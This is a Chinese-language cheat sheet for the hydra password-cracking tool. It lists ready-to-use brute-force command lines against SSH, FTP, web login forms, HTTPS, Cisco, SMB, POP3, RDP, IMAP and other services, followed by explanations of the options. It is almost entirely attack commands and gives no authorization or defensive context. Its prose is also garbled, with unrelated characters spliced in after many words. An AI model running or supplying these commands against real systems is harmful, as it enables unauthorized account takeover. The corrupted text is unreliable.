hydra 暴力破解工具膝迎,可爆破很多服務(wù)炼鞠,例如開機(jī)用戶名密碼
1咙轩、破解ssh:
hydra -l 用戶名 -P 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -P 密碼字典 -t 線程 -o save.log -vV ip ssh
2苞慢、破解ftp:
hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認(rèn)16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
3蟹演、get方式提交风钻,破解web登錄:
hydra -l 用戶名 -P 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -P 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
4、post方式提交酒请,破解web登錄:
hydra -l 用戶名 -P 密碼字典 -s 80 10.36.16.18 http-post-form -o out.txt -f -t 3
“index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”
參數(shù)說(shuō)明:-t同時(shí)線程數(shù)3骡技,-l用戶名是admin,字典pass.txt羞反,保存為out.txt布朦,-f 當(dāng)破解了一個(gè)密碼就停止囤萤, 10.36.16.18目標(biāo)ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,中的內(nèi)容是表示錯(cuò)誤猜解的返回信息提示喝滞。
5阁将、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -l 用戶名 -P 密碼字典 -s 端口號(hào) -vV ip teamspeak
7右遭、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8做盅、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10窘哈、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11吹榴、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
-R 根據(jù)上一次進(jìn)度繼續(xù)破解
-S 使用SSL協(xié)議連接
-s 指定端口
-l 指定用戶名
-L 指定用戶名字典(文件)
-p 指定密碼破解
-P 指定密碼字典(文件)
-e 空密碼探測(cè)和指定用戶密碼探測(cè)(ns)
-e n 使用空密碼
-e s 使用的密碼和用戶名一樣
-e ns 上面兩者的結(jié)合
-M FILE 指定目標(biāo)列表文件一行一條滚婉。
-C 使用冒號(hào)分割格式(username:password)可以代替-l username -p password
-o 輸出文件
-w TIME 設(shè)置最大超時(shí)的時(shí)間图筹,單位秒,默認(rèn)是30s
-t 指定多線程數(shù)量让腹,默認(rèn)為16個(gè)線程
-vV 顯示詳細(xì)過程
-f 當(dāng)破解了一個(gè)密碼就停止
---------------------
